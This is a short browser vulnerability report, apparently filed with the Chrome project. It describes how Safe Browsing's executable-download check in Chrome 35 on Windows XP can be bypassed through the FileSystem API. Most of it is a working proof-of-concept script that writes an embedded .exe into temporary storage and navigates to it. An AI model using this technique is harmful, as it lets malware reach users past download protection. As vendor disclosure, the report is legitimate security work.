VULNERABILITY DETAILS Safe Browsing for Executable Files can be bypassed by using the FileSystem API, by creating the .exe file to be downloaded in a temporary filesystem, and then navigating to it. A server-side PHP script in this case builds the javascript byte array, but other techniques could be used here (eg. an XMLHttpRequest returning a Blob.) You must not be in Incognito mode for this to work. VERSION Chrome Version: 35.0.1916.114 m + stable Operating System: Windows XP Home Edition Service Pack 3 REPRODUCTION CASE Test case available at https://server2.vittgam.net/testerone123/exedlvuln/vuln.php <script> (function(){ var errorize=function(e){console.log(e);}; var filename='msghello-bypass.exe'; var blob=new Blob([new Uint8Array(<?php echo str_replace(',',', ',json_encode(array_map('ord',str_split(file_get_contents('msghello.exe'))))); ?>)],{type:'application/octet-stream'}); window.webkitRequestFileSystem(window.TEMPORARY,1048576,function(fs){ var createFile=function(){ fs.root.getFile(filename,{create:true,exclusive:true},function(fileEntry){ fileEntry.createWriter(function(writer){ writer.onwriteend=function(){ window.location.href=fileEntry.toURL(); }; writer.onerror=errorize; writer.write(blob); },errorize); },errorize); }; fs.root.getFile(filename,{create:false},function(fileEntry){ fileEntry.remove(createFile,errorize); },createFile); },errorize); })(); </script>